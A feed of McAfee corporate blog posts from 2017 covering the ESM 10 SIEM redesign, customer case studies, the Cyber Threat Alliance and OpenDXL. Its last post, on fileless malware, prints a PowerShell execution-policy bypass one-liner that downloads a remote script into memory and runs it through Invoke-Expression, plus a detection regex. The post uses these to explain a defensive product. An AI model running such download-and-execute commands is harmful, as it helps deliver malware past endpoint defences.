Eating an Elephant: How the ESM 10 UX Team Reenergized SecOps (Part 2) https://securingtomorrow.mcafee.com/business/security-operations/eating-elephant-esm-10-ux-team-reenergized-secops-2/ https://securingtomorrow.mcafee.com/business/security-operations/eating-elephant-esm-10-ux-team-reenergized-secops-2/#respond Mon, 27 Feb 2017 16:46:51 +0000 https://securingtomorrow.mcafee.com/?p=69755 This blog was written by Barbara Kay. The second of a two-part series. In the previous post in this series, we described how re-creating the user experience for overburdened SOC analysts was a task like “eating an elephant.” To help analysts who are constrained by time and cognitive overload, we needed a vision, a strategy […]

The post Eating an Elephant: How the ESM 10 UX Team Reenergized SecOps (Part 2) appeared first on McAfee Blogs.

]]>
This blog was written by Barbara Kay.

The second of a two-part series.

In the previous post in this series, we described how re-creating the user experience for overburdened SOC analysts was a task like “eating an elephant.” To help analysts who are constrained by time and cognitive overload, we needed a vision, a strategy and a plan to “save time and save mental energy.”

After extensive, in-depth interviews with users, we realized that the majority of user time is spent in analysis and research. This finding drove our plan. We focused first on the analysts and the workflows and workspaces where they spend the majority of their time.

Now you can see the results in ESM 10.0. The user experience team recommends these 3 things to appreciate first:

  • Quick start: you will find that the organization simplifies building and navigating relationships, so you can create views and get started without reading manuals (although we still recommend looking at the ESM expert center!). The most commonly used views appear together by default, and help you make use of associated content packs and their views, dashboards, rules, and alerts (including correct placement of related updates to keep you organized). While the donut visualizations will help you identify trends and pursue relationships, the right clicks help you navigate to next steps. And, if you are a current user, you can import existing views from within the console to bring forward your preferred processes and organizational knowledge.
Analysts can manage several tabs active at once, enabling them to toggle back and forth to pursue different tasks. This means less holding of information in your memory and less repetition, including defining complex searches.
  • Centralized, dynamic workspaces: Multiple tabs within the same dashboard pane organize parallel exploration of ideas. The analyst can simultaneously drill down and filter through different lenses of the data without losing context and state or re-applying searches and filters. With several tabs active at once, you can toggle back and forth to pursue different tasks, or within a task, collect and guide analysis or research hypotheses. This means less holding of information in your memory and less repetition, including defining complex searches. Further, a majority of our configuration, advanced settings, and set up tools now live in panels that slide in to the side of the dashboard instead of popping up in a window in front of the dashboard. This allows users to stay in context with their current investigation (stay in the same mental “room”) while they adjust settings in the various tools. In addition, the context menus mean that right clicking on a specific item—such as a field on a record within a table chart—will provide the user with quick access to actions specific to that field.
ESM 10.0 features directed search to help users quickly navigate to desired content without remembering folder structures or even the exact names of things.
  • Directed search: Detecting signal from the noise means filtering and searching through alerts and events, and avoiding the distraction of unneeded data. The new advanced search and filter organization includes auto-complete to help guide users to find or choose from relevant associations quickly, rather than needing to know what choices are appropriate to the data or investigation type. Auto-complete simplifies device selection, view management, queries, and filters, to name a few, as the user quickly navigates to the content they desire, without having to remember exactly where it resides within the folder structure of these tools. For example, we prompt for the best visualization options for each search result type to quickly filter and customize data. As you navigate, the process creates bindings that you can save for later. You can then take quick actions on data points, such as creating watchlists and case management, by accessing right-click contextual menus. Synthesizing all these workflow steps into a single place helps the right thing happen, consistently, with less effort, repetition, and time. Our improved search also means you do not need to be a software developer to extract insights quickly.

Each of the above examples reduces clock time and conserves mental energy. They are small steps in our larger plan to help you conquer that other elephant, the elephant in the room: security operations efficiency. See for yourself by downloading the new version now.

The post Eating an Elephant: How the ESM 10 UX Team Reenergized SecOps (Part 2) appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/security-operations/eating-elephant-esm-10-ux-team-reenergized-secops-2/feed/ 0
Eating an Elephant: How the ESM 10 UX Team Reenergized SecOps (Part 1) https://securingtomorrow.mcafee.com/business/security-operations/eating-elephant-esm-10-ux-team-reenergized-secops/ https://securingtomorrow.mcafee.com/business/security-operations/eating-elephant-esm-10-ux-team-reenergized-secops/#respond Wed, 22 Feb 2017 20:35:02 +0000 https://securingtomorrow.mcafee.com/?p=69745 This blog was written by Barbara Kay. The first of a two-part series For some reason, elephants figure frequently in our conversations – “seeing different parts of the elephant”, “memory like an elephant,” and now, “eating an elephant.” This phrase, definitely meant as an analogy, expresses the lengthy, enormous, and daunting task that our development […]

The post Eating an Elephant: How the ESM 10 UX Team Reenergized SecOps (Part 1) appeared first on McAfee Blogs.

]]>
This blog was written by Barbara Kay.

The first of a two-part series

For some reason, elephants figure frequently in our conversations – “seeing different parts of the elephant”, “memory like an elephant,” and now, “eating an elephant.” This phrase, definitely meant as an analogy, expresses the lengthy, enormous, and daunting task that our development team faced in reimagining the user experience in our McAfee Enterprise Security Manager (ESM) SIEM solution. To succeed, they needed a vision, strategy, and plan.

The new ESM 10.0 user interface has been designed to reduce cognitive strain – providing content in context as the user goes about tasks

First, a vision. In the last few years, driven by increasingly complex incidents, the security operations mantra has shifted to real-time analysis coupled with individual and team efficiency. Countless research studies document the shortage of skilled security analysts and researchers. Time clearly needed to be a part of the vision.

But for the user experience team, productivity isn’t just about elapsed time. It also includes the cognitive workload that can subtly wear down and exhaust the analyst. You probably experience cognitive overload today. You walk from the kitchen into the bedroom and stand there wondering why you came in. This is true when we move between physical rooms, and it’s true when we move between virtual rooms, such as in a video game or user interface. In this context switch, it turns out we are 2-3 times more likely to forget! And it gets worse. This memory lapse is aggravated if you are sleep deprived or over-stressed, like new parents, air traffic controllers, and security analysts.

Once we hit our cognitive threshold, we have only emotion to fall back on. So the typical analyst has faulty memory plus frustration. This combination makes for poor security decisions. It is why we design for “high context” UIs. We are striving for one room with all the relevant data so the analyst can focus on making good decisions.

From a design perspective, here are some specific cognitive workload tests:

  • The “data fragmentation” load: How much data does the user have to keep in his memory as he changes screens, modes, and tasks, or retain over a series of tasks?
  • The “navigation” burden: How many times does the user traverse up and down task flows and screens in pursuit of a task?
  • The “mind-numbing” factor: How many times does that task need to be repeated per hour/day/week?
  • The “clutter” factor: How much data is displayed all at once? How hard is it to identify and navigate relationships?

Instead of simply looking at faster functioning of the same processes, we wanted to reduce the cognitive burden of the user – to keep them as effective as possible for as many hours of their day as possible. This “save time, save mental energy” approach formed the core of our vision. Our logic was this: Anything we could do to improve their productivity and enhance concentration would pay off in speed of results, capacity of analysts, and quality of life for them and their management team.

This illustrates the complexity of SIEM, showing first and second level nodes in the ESM 9.X user interface.

Next, a strategy. As the epicenter of security operations, a SIEM is a complex animal, and the UI and user design can mask or multiply this complexity. The graphic gives you an idea of the scope of this effort, the first and second level nodes in the ESM 9.X user interface. Every node has multiple screens under it.

Lots to do, clearly, but where could we best affect time spent? After dozens of site visits and in-depth, interactive usage interviews, we discovered more than half of the users were security operations, and another 29% were Infrastructure Operations. Given these day-to-day jobs, the majority of user time is spent in analysis and research.

In the second part of this series, we’ll continue the user experience journey with the ESM 10.0 UX design team as they build out the plan for the new ESM 10.0 solution.

The post Eating an Elephant: How the ESM 10 UX Team Reenergized SecOps (Part 1) appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/security-operations/eating-elephant-esm-10-ux-team-reenergized-secops/feed/ 0
Large Healthcare Company Standardizes on McAfee ENS 10.5 and McAfee MOVE AntiVirus to Protect 100,000+ Physical and Virtual Endpoints https://securingtomorrow.mcafee.com/business/large-healthcare-company-standardizes-mcafee-ens-10-5-mcafee-move-antivirus-protect-100000-physical-virtual-endpoints/ https://securingtomorrow.mcafee.com/business/large-healthcare-company-standardizes-mcafee-ens-10-5-mcafee-move-antivirus-protect-100000-physical-virtual-endpoints/#respond Thu, 16 Feb 2017 16:00:25 +0000 https://securingtomorrow.mcafee.com/?p=69290 Security Engineer Scott M. knows that for organizations like his, a large North American healthcare company, information security defenses must continually adapt to face new threats and to accommodate business or industry changes—else risk dire consequences. That is why his company is beefing up its endpoint defenses by migrating from another vendor’s endpoint protection solution […]

The post Large Healthcare Company Standardizes on McAfee ENS 10.5 and McAfee MOVE AntiVirus to Protect 100,000+ Physical and Virtual Endpoints appeared first on McAfee Blogs.

]]>
Security Engineer Scott M. knows that for organizations like his, a large North American healthcare company, information security defenses must continually adapt to face new threats and to accommodate business or industry changes—else risk dire consequences.

That is why his company is beefing up its endpoint defenses by migrating from another vendor’s endpoint protection solution to Complete Endpoint Protection- Business and McAfee Endpoint Security (ENS), a more collaborative, more intelligent endpoint protection framework. Some of the company’s Windows-based desktops were migrated to ENS version 10.2 before an end-of-the-year freeze on IT changes, but the rest will be migrated directly to ENS 10.5, which will be a key component of the standard physical desktop build going forward.

Scott anticipates that ENS 10.5 will provide a huge leap in performance and protection against advanced malware. “[McAfee] ENS 10.5 looks like it is going to be amazing,” says Scott. “It reflects a long-term vision of how to address endpoint protection…The technology behind it is very solid.”

Scott also values the modular “blade” design of ENS: “It’s exactly what we’re looking for. Install what you need as opposed to a single program that has all the features and you turn some of them off. As an administrator, that’s very useful [and] adds a lot of flexibility.” Modularity also makes it easier for Scott to add functionality to ENS in the future as needed or as new capabilities become available.

Securing Virtualized Environment with Minimal Resource Consumption                                  

In addition, as the company seeks to reap cost efficiencies by increasing the size of its virtualized environment, it is making sure that all of its virtualized endpoints are as secure as its physical endpoints.

In the next six months, the company will add 13,000 virtual workstations, bringing its total to more than 55,000—in addition to 55,000 physical workstations and 7,500 virtual and physical servers.  To protect all those virtual machines, Scott deployed McAfee Management for Optimized Virtual Environments (MOVE) Antivirus 4.0. With the same McAfee ePolicy Orchestrator® (ePO™) central console used to manage the company’s McAfee Complete Endpoint Protection- Business, he can easily manage endpoint protection across the company’s entire physical and VDI environments, ensuring that all endpoints share the same unified security policies, and view the “full security picture across platforms.”

What Scott appreciates most about McAfee MOVE AntiVirus is its efficiency. The company’s previous anti-virus protection for VDI consumed 30 percent of I/O operations just in updating definitions and pushing them out—a process that Scott had to spread across eight hours before a new update would begin. But with MOVE AntiVirus, vastly more efficient resource utilization results in minimal impact on virtual machine performance, much faster scans, and freed up resources.

To eliminate scanning bottlenecks and delays, McAfee MOVE AntiVirus offloads scanning, configuration, and .DAT update operations to an offload scan server which maintains a global cache of files that have already been scanned, thereby avoiding the need for duplicate scans. In an environment of 40,000+ virtual desktops (soon to be 50,000+), only having to scan a given file once—instead of 40,000 or 50,000 times—results in enormous resource savings.

McAfee MOVE AntiVirus also allowed the healthcare company to dramatically reduce the impact of security on storage and eliminate the need to constantly chase resources. “Previously we had to actually stop updates before they had finished when we had less than full capacity—for instance, if we had a failed drive controller on an array,” explains Scott. “In the past, security was taking a back seat to performance. With McAfee MOVE AntiVirus, however, we no longer have to make that compromise.”

In addition, since McAfee MOVE version 4.0 and McAfee ENS are built to leverage the open McAfee Data Exchange Layer (DXL) application framework, they enable the healthcare company’s VDI environment to supplement McAfee Global Threat Intelligence with local threat information from McAfee Threat Intelligence Exchange and other security solutions, such as McAfee Advanced Threat Defense, to enhance detection and prevention of zero-day, unknown threats across the entire environment, including VDI.

Together, McAfee Endpoint Security and McAfee MOVE AntiVirus are strengthening the company’s ability to protect, detect, and correct across its entire endpoint base, physical and virtual, and to continue to adapt in these, to quote Scott, “interesting times” in which we live.

 

The post Large Healthcare Company Standardizes on McAfee ENS 10.5 and McAfee MOVE AntiVirus to Protect 100,000+ Physical and Virtual Endpoints appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/large-healthcare-company-standardizes-mcafee-ens-10-5-mcafee-move-antivirus-protect-100000-physical-virtual-endpoints/feed/ 0
Surviving the Deluge: Lifecycle Support for the SOC https://securingtomorrow.mcafee.com/business/surviving-deluge-lifecycle-support-soc/ https://securingtomorrow.mcafee.com/business/surviving-deluge-lifecycle-support-soc/#respond Tue, 14 Feb 2017 16:00:04 +0000 https://securingtomorrow.mcafee.com/?p=69152 This blog was written by Barbara Kay. For the last month, my corner of Northern California has endured record-breaking inundation from the skies, leading to mud slides, downed power lines, road closures, and, in my case at least, propane and power outages. It’s been hard to stay productive, stretching the resources of laptops, UPSes, mobile […]

The post Surviving the Deluge: Lifecycle Support for the SOC appeared first on McAfee Blogs.

]]>
This blog was written by Barbara Kay.

For the last month, my corner of Northern California has endured record-breaking inundation from the skies, leading to mud slides, downed power lines, road closures, and, in my case at least, propane and power outages. It’s been hard to stay productive, stretching the resources of laptops, UPSes, mobile phones, wood piles, flashlights, candles, and great neighbors. After years of boycotting, I even went back on Facebook to monitor road status through our private group. These sacrifices drive home how simple and seamless our lives can be when systems work together, and how much havoc occurs when something basic fails you.

My real-world experience echoes the reality of modern security operations. Analysts scramble, juggle, and make do as they fight a flood of security alerts, threat intelligence, and news feeds. Architects see the reality of today’s flood and also look to the horizon with storms of sophisticated attacks, organized cyber-pirates, and uncertain economics. CISOs oversee all of this, trying to match limited resources to unlimited expectations.

How are these practitioners coping? According to a just-completed survey of IT decision-makers in 800 enterprises:

  • 71% maintain a security platform that integrates existing and new technologies so their current cybersecurity measures don’t open their organization to new risk.
  • 64% also prefer to acquire overlapping technologies across the stack.
  • 41% partner with third party security service providers, and
  • 37% leverage automated workflows to address lowest level threats.

These strategies form the backbone of an open, resilient security architecture.

  • The platform captures more value from existing investments and factors in issues that point products don’t address, such as overall visibility and operational efficiency
  • Overlapping (not necessarily duplicative defense in depth) technologies help minimize coverage gaps and bridge technology cycles
  • Third parties bootstrap best practice adoption and fill staffing and tools shortages
  • Automation clears away the knowable efficiently to help security systems and experts focus on the unknown and suspicious.

New Options for Operational Excellence

Security operations benefit enormously from this design model, and McAfee is investing to help you get there. Today we proudly announced an expansion of our integrated security operations solution, with its cornerstone the new release of McAfee Enterprise Security Manager 10. The redesigned user experience guides and facilitates investigations that explore data and intelligence from any source. Behind the scenes, the SIEM can ingest any type of threat intelligence and automatically correlate in investigations, and the analyst manages and explores these insights through an investigation workspace featuring multiple incident investigation panels on the same tab and a specialized incident management dashboard.

As part of the new user experience, analysts can directly pull down updated content packs for specific use cases on demand. With a few clicks, the analysts populate rules, visualizations, alarms, and dashboards for high-value basic and advanced use cases. These help analysts filter out the knowable to identify the risky and malicious. Content packs are a great way to perform core SIEM functions like monitoring and compliance, but they also make it easy to adopt the more advanced features that support proactive security operations. For example, packs can populate sophisticated, high-speed statistical, rule, risk, and historical correlations of behavior, context, and events. Building on these content packs, users can apply advanced correlations to customize precise and targeted filters, such as a series of specific events on a specific host within a specific time range.

An Ecosystem for Extensibility

Adding to our app catalog, new ESM-integrated partners expand our solutions for customers with more orchestration options, including an integration with Phantom, which won the RSA Innovation sandbox last year, as well as Ayehu and Demisto. These partners complement the native automation in our platform. [To see details on these and other partnerships, including the six user behavior analytics (UBA) partners we highlighted last fall, click here.]

The growing OpenDXL initiative further extends the security operations platform equation, with the release of new open source clients (www.github.com/opendxl). Simple (just a few lines of code) integrations with these clients will let security teams connect open source software, scripts, and in-house or legacy applications to each other, to commercial products, and to McAfee products. This approach fulfills the platform goals for efficient integration of software as well as automation. Analysts can integrate their preferred tools and scripts for tighter operation and automate hugely valuable functions such as: search and scan endpoints for IOCs and malware; query and set file and application reputations; and apply policies, tag systems, move groups and trigger actions for managed systems via the centralized control and policy management of McAfee ePolicy Orchestrator.

In addition to these community resources, independent software vendors supporting DXL have increased 60% since the 2016 RSA Conference. I’m especially pleased to see vendors like TrapX and CheckPoint publishing rich forms of threat intelligence (deception and IP/Domain/URL reputation, respectively) to improve the capabilities of other applications connected to the DXL communications fabric. As a real-time messaging fabric, DXL offers the ideal place for this exchange of data and service requests.

Services for the SOC

Finally, to help fulfill the need for third party service providers and expertise, McAfee’s Professional Services team has expanded its SOC lifecycle services with a new virtual SOC program. Foundstone Threat Researchers can supplement existing enterprise capabilities with analyst and threat hunter expertise, capacity, and 24/7 coverage. These services add on to emergency incident response, penetration testing, strategic program development, and education services that bring proven expertise to any enterprise.

All of these capabilities will help security operations teams expedite the detection and correction processes. And importantly, they will build in structural support for the long term—improving organizational agility to adapt to the deluge of new threats and requirements. An open and automation-centric design connects controls and operations to feed better protection back in to policies, processes and countermeasures in a threat defense lifecycle.

The post Surviving the Deluge: Lifecycle Support for the SOC appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/surviving-deluge-lifecycle-support-soc/feed/ 0
The Cyber Threat Alliance Steps Up to Boost Protection https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/cyber-threat-alliance-steps-boost-protection/ https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/cyber-threat-alliance-steps-boost-protection/#respond Tue, 14 Feb 2017 13:00:22 +0000 https://securingtomorrow.mcafee.com/?p=69124 This blog post was written by Vincent Weafer. With each new cyber threat report, we learn about the increasing volume of new, complex threats appearing across a myriad of server systems, networking equipment, personal computing platforms, and IoT devices. We also read about the real-world challenges that information security professionals face when attempting to identify, […]

The post The Cyber Threat Alliance Steps Up to Boost Protection appeared first on McAfee Blogs.

]]>
This blog post was written by Vincent Weafer.

With each new cyber threat report, we learn about the increasing volume of new, complex threats appearing across a myriad of server systems, networking equipment, personal computing platforms, and IoT devices. We also read about the real-world challenges that information security professionals face when attempting to identify, scope, and prioritize security events generated by their security systems.

In some environments, this volume can be measured in the millions or tens of millions of events per day. Security practitioners need help identifying the under-the-radar, high-risk incident and breach events from the huge volume of legitimate but less critical security events, and they need help automating and coordinating their security protection actions across multiple technologies and vendors so they can decrease the time to protect.

Enter the Cyber Threat Alliance. The CTA has grown from a research collaboration between McAfee, Palo Alto Networks, Symantec, and Fortinet into a newly incorporated “not for profit” organization that combines the threat intelligence capabilities of some of the top companies in the cybersecurity industry to tackle the problem of isolated knowledge, which limits each company’s ability to protect its customers as quickly as possible. Also announced this week is the addition of Cisco and Check Point as founding members.

CTA member executives Chris Young, Senior VP and General Manager, McAfee; Michael Daniel, president, Cyber Threat Alliance; Mark McLaughlin, chairman and CEO, Palo Alto Networks; Amnon Bar-Lev, President, Check Point; Marty Roesch, Chief Architect, Cisco Security; Greg Clark, CEO Symantec; Ken Xie, founder, chairman of the board and CEO, Fortinet.

The CTA is focused on tackling the problem of fractured intelligence in the cybersecurity market, and so the organization has created a dynamic real-time trust exchange for threat indicator sharing, validation, and monitoring. Gathering, contextualizing, and sharing knowledge among CTA members using this automated exchange will enable us to protect customers in real time and prioritize resources based on collective knowledge.

At McAfee, we believe in the power of together—the power of sharing intelligence to strengthen critical infrastructure and protect our customers. We are very excited about the potential for the Cyber Threat Alliance. To learn more, visit www.cyberthreatalliance.org. To learn more about threat intelligence sharing and McAfee’s part in that effort, visit www.mcafee.com/threatintelligencesharing. If you are part of the security vendor community and want to learn more about becoming a member of the CTA, please email membership@cyberthreatalliance.com.

The post The Cyber Threat Alliance Steps Up to Boost Protection appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/cyber-threat-alliance-steps-boost-protection/feed/ 0
Mission Made Possible: The Open Integration Time Machine https://securingtomorrow.mcafee.com/business/security-operations/mission-made-possible-open-integration-time-machine/ https://securingtomorrow.mcafee.com/business/security-operations/mission-made-possible-open-integration-time-machine/#respond Mon, 06 Feb 2017 17:16:44 +0000 https://securingtomorrow.mcafee.com/?p=68833 This blog was written by Barbara Kay. A fast-forward button for integration to a unified security architecture. One of the reasons why the Mission Impossible premise has resonated across the generations is that all of us, at one time or another, are handed projects that seem to come with that label. Unfortunately, if you’re like […]

The post Mission Made Possible: The Open Integration Time Machine appeared first on McAfee Blogs.

]]>
This blog was written by Barbara Kay.

A fast-forward button for integration to a unified security architecture.

One of the reasons why the Mission Impossible premise has resonated across the generations is that all of us, at one time or another, are handed projects that seem to come with that label. Unfortunately, if you’re like me, you feel more like Wile. E. Coyote holding that bomb as it explodes, rather than the cool Tom Cruise or unflappable Peter Graves if you are an old-school fan.

It seems I am always searching for the magical fast-forward button or time machine that allows me to bend the laws of time and physics to defuse the bomb and save the day.

Impossible? Maybe not always. Consider the following scenario:

The architect for ALPHA, which is merging with another company, ZED, is trying to sort through and integrate ZED’s application software and data with ALPHA’s systems to create a unified security operations environment. In 60 days, the security infrastructure has to be 1) functional 2) compliant 3) reliable. And of course, the analysts won’t tolerate any visible change –such as slower performance, loss of features, and longer wait times for searches, reports, or visualizations.

Our hero has figured out which data and applications to keep and connect. In some cases systems will run side by side, before eventually replacing one system with another – some of Zed’s software is more modern and capable than ALPHA’s, and both companies have some existing (legacy) software that can’t be shut down anytime soon because of compliance or mission-critical functions. So our hero knows which assets he cares about. Now he has to make it all talk together. In 60 days.

One day, our hero, is blissfully sipping tea while researching integrations from his key vendors, looking for APIs and scripting options. Suddenly, the CISO comes in with an update from the board meeting: Accelerate the merger’s close by 30 days, because the timing is helping the competition disrupt deals. That means he has to get the integrations done in half the time. Our hero needs a fast forward button for the plan.

Now the bomb is ticking down. There’s no peace in the architect’s cube. The “to do” list of integrations looks way too long. Precious few of the commercial vendors offer the necessary integrations off the shelf, and he can’t believe how few publish APIs or scripting frameworks for self-service. Open source would help, but that code requires validation and testing. How the heck is he going to pull this off? 16 hour days?

Our scene advances as the CISO checks back in the next morning. While the architect was caffeinating for a long day of writing custom integrations, the manager was breakfasting with a CISO for a health care provider. That CISO was talking about the rollercoaster of the last few years, with one merger per year. But they had found a time machine. Last year, her team used OpenDXL to integrate the two companies’ applications and had great results. OpenDXL Python scripts connected all the apps to a common application framework. This approach made it easier to add apps and data sources as they matured their requirements, and also to insulate systems from direct dependencies. This abstraction gave them more flexibility to distribute and evolve the underlying systems as well. It was the best merger experience they’d had in 5 years, and the CISO felt ready to handle whatever the Board dealt out next with aplomb.

The architect was already googling for “OpenDXL”. Even if the story were only half true, it had to be worth a shot. On GitHub.com/opendxl lay a treasure trove of integration examples, free downloads, and test software for integrating applications. A link to mcafee.com/dxl showed that several of the company’s targeted applications and vendors were already integrated with DXL. 

Fast forward. It’s 30 days later, and our hero has made it. Systems running, compliance audits passed, uptime goals met. Whew. And an unexpected benefit – because DXL has a real-time data exchange, several of the SecOps team’s tedious serial workflows had gotten FASTER. Maybe the fast forward button was stuck on. That was a technology glitch to get excited about. And when the CISO handed out a bonus check for meeting the date, the day got even better.

If you think about it, the best stories on Mission Impossible were always the ones where the tools to solve the case were already available. It was just a matter of knowing where to look. So what are you waiting for? The clock is ticking…

The post Mission Made Possible: The Open Integration Time Machine appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/security-operations/mission-made-possible-open-integration-time-machine/feed/ 0
Interview with a Lead Information Security Engineer about His Company’s Experience Migrating to McAfee Endpoint Security https://securingtomorrow.mcafee.com/business/interview-lead-information-security-engineer-companys-experience-migrating-mcafee-endpoint-security/ https://securingtomorrow.mcafee.com/business/interview-lead-information-security-engineer-companys-experience-migrating-mcafee-endpoint-security/#respond Thu, 02 Feb 2017 18:16:23 +0000 https://securingtomorrow.mcafee.com/?p=68713 Chris T. is the lead information security engineer on a team that oversees a host of McAfee endpoint and network products at his U.S. insurance company with approximately 8,000 endpoints. The company recently migrated endpoints to ENS 10.2 and plans to migrate to ENS 10.5 in the next three months. Q. What was the driving […]

The post Interview with a Lead Information Security Engineer about His Company’s Experience Migrating to McAfee Endpoint Security appeared first on McAfee Blogs.

]]>
Chris T. is the lead information security engineer on a team that oversees a host of McAfee endpoint and network products at his U.S. insurance company with approximately 8,000 endpoints. The company recently migrated endpoints to ENS 10.2 and plans to migrate to ENS 10.5 in the next three months.

Q. What was the driving factor in the decision to migrate to McAfee Endpoint Security (ENS)?
A. About five years ago we desired to consolidate our information security solutions and create a more manageable security footprint. We had products all over the place, each with its own agent; it worked, but it wasn’t the ideal situation. So when ENS came along, we seized the opportunity to simplify security management and shrink our security footprint. Implementing McAfee Endpoint Security represents our first step toward establishing a more refined, smaller security footprint and easier management.

Q. Did you wait until you had an upcoming endpoint renewal?
A. No. We migrated mid-contract. We don’t base our technology upgrades on contract dates; we do what makes the most sense when it makes the most sense. So the fact that the upgrade was free for us (and many users of McAfee legacy endpoint protection) didn’t make that big a difference for us; we just wanted to reap the benefits of the newer, better endpoint protection as soon as possible.

Q. What was your migration experience like?
A. After a very positive experience beta-testing McAfee Endpoint Security 10.2, we deployed it, including its three core components—Threat Prevention, Web Control, and Firewall—to the majority of our approximately 8,000 Windows-based nodes. We used the McAfee migration tool to copy security policies from our Complete Endpoint Threat Protection suite to Endpoint Security. We could have migrated much faster—migration itself is fairly straightforward—but we took advantage of the migration to “clean house”—to eliminate extra legacy baggage and extraneous files and fine tuning policies and settings.

In the next three months, we plan to migrate all of our 8,000 Windows nodes to ENS version 10.5 as part of our enterprise rollout of Windows 10. McAfee ENS version 10.5 will be a core component of our desktop image. In version 10.5, we are looking forward to even better performance.

Q. What has been the biggest benefit so far from deploying McAfee Endpoint Security?
A. In my mind the biggest benefit of migrating to McAfee Endpoint Security has been improved performance. Users who didn’t have issues with virus scan impact beforehand don’t even realize a change has been made. But for the users who complained, the difference is enormous. On machines with tens of thousands of archive files and some other legacy devices, anti-malware scans could run for days. We targeted those vocal complainers as some of our first for migration to the new endpoint security framework. As soon as their machines were upgraded, their calls [to the IT help desk] stopped.

The overall performance [gain] by consolidating the tools has been rather dramatic. For example, desktops that used to experience 90-95 percent spikes in CPU utilization during anti-virus scans now reach at most 30-35 percent utilization. The customer experience, which is really our end game, has just been dramatically improved.

Q. End users are obviously happier and more productive now. What about security operations?
A. We save a tremendous amount of time. With improved protection at the endpoint, we spend fewer hours reimaging desktops and performing other remediation. Furthermore, by eliminating the need to troubleshoot issues related to legacy software, McAfee Endpoint Security has saved our team countless man-hours each week.

Q. What would you tell other companies who are considering whether to migrate from legacy endpoint protection?
A. McAfee Endpoint Security is, to use an overused but apt term, ‘state of the art.’ It represents the next evolution of endpoint protection. It’s more stable, more efficient, and more accurate. It is definitely worth migrating to.

 

The post Interview with a Lead Information Security Engineer about His Company’s Experience Migrating to McAfee Endpoint Security appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/interview-lead-information-security-engineer-companys-experience-migrating-mcafee-endpoint-security/feed/ 0
Fileless Malware Execution with PowerShell is Easier than You May Realize https://securingtomorrow.mcafee.com/business/fileless-malware-execution-with-powershell-is-easier-than-you-may-realize/ https://securingtomorrow.mcafee.com/business/fileless-malware-execution-with-powershell-is-easier-than-you-may-realize/#respond Thu, 02 Feb 2017 14:00:03 +0000 https://securingtomorrow.mcafee.com/?p=68679 This blog post was written by Teresa Wingfield. Fileless Malware Execution with Microsoft PowerShell Fileless malware is an attack that occurs by methods such as embedding malicious code in scripts or loading malware into memory without writing to disk. PowerShell can run a script directly in memory; hence, it is increasingly being used to perpetrate […]

The post Fileless Malware Execution with PowerShell is Easier than You May Realize appeared first on McAfee Blogs.

]]>
This blog post was written by Teresa Wingfield.

Fileless Malware Execution with Microsoft PowerShell

Fileless malware is an attack that occurs by methods such as embedding malicious code in scripts or loading malware into memory without writing to disk. PowerShell can run a script directly in memory; hence, it is increasingly being used to perpetrate fileless attacks. Since the file never gets copied to disk, it is easy to bypass endpoint security that typically depends on file I/O to detect threats.

You may think that you are protected from fileless malware because your PowerShell execution policies are set to “Restricted” so that scripts can’t run.  However, attackers can easily bypass these policies as shown in the following examples.

Loading scripts directly in memory

An attacker can perform remote execution of a script by directly executing it in memory to bypass endpoint security. Here is a command line example that uses the DownloadString method to download content from a remote location to a buffer in memory:

powershell.exe -ep Bypass -nop -noexit -c iex ((New ObjectNet.WebClient).DownloadString(https://[website]/malware.ps1′))

The purpose of the “Bypass” parameter is to bypass execution policies so that administrators can remotely execute commands. However, attackers can also use the same parameter to bypass security. Because using this parameter doesn’t result in any configuration change, it’s a common target to bypass security.

Running scripts without the default PowerShell interpreter

Administrators can lockdown PowerShell and other interpreters based on an extension. While you may have blocked execution of an extension such as .ps1, an attacker can bypass it by using anther extension. For example, PowerShell’s Get-Content can access the content of a .ps2 malware script and pass it to Invoke-Expression (iex) for execution:

powershell.exe –ep Bypass “& {Get-Content .\malware.ps2 | iex}

This is a security issue since the iex cmdlet opens up the script to injection attacks.

Running system interpreters such as Powershell.exe in interactive mode

Once attackers get hold of the system, they can directly execute malicious commands using PowerShell.exe in interactive mode.

How McAfee Application Control Helps Stop Fileless Malware

McAfee Application Control is a whitelisting solution that blocks unauthorized applications and code from running on servers, desktops, and fixed-function devices. With its advanced execution control, this solution can prevent attacks that bypass file I/O. McAfee Application Control can block execution of scripts based on command line parameters using common interpreters such as PowerShell and wscript and can block PowerShell from running in interactive mode.

McAfee Application Control also provides the flexibility to combine rules based on file name, process name, parent process name, command line parameters and user name as shown in the screenshot below. For example, you can create a rule to block execution of a PowerShell script that uses “Bypass” as a command line argument for execution by an unauthorized user, even a local administrator. You can also use a regular expression to create generic policies. For example, .*\bi[“‘`]*e[“‘`]*x\b.* blocks Invoke-Expression.

Often attackers use Word or Excel attachments in email to execute PowerShell or a script for an attack. Using McAfee Application Control, you can specify a parent process name as word.exe, excel.exe or a browser to prevent execution of PowerShell or another interpreter.

Learn More

Advanced execution control provides infinite options to create a robust security. By the way, McAfee Application Control also helps prevent exploitation when using approved binaries and system tools such as InstallUtil, regsvc and Regedit. If you’re interested in learning more click here.

References

Loeb, Larry, “Fileless Malware Loaded Into Memory via PowerShell”, Security Intelligence, 16 March 2016,

https://securityintelligence.com/news/fileless-malware-loaded-into-memory-via-powershell/

 

The post Fileless Malware Execution with PowerShell is Easier than You May Realize appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/fileless-malware-execution-with-powershell-is-easier-than-you-may-realize/feed/ 0
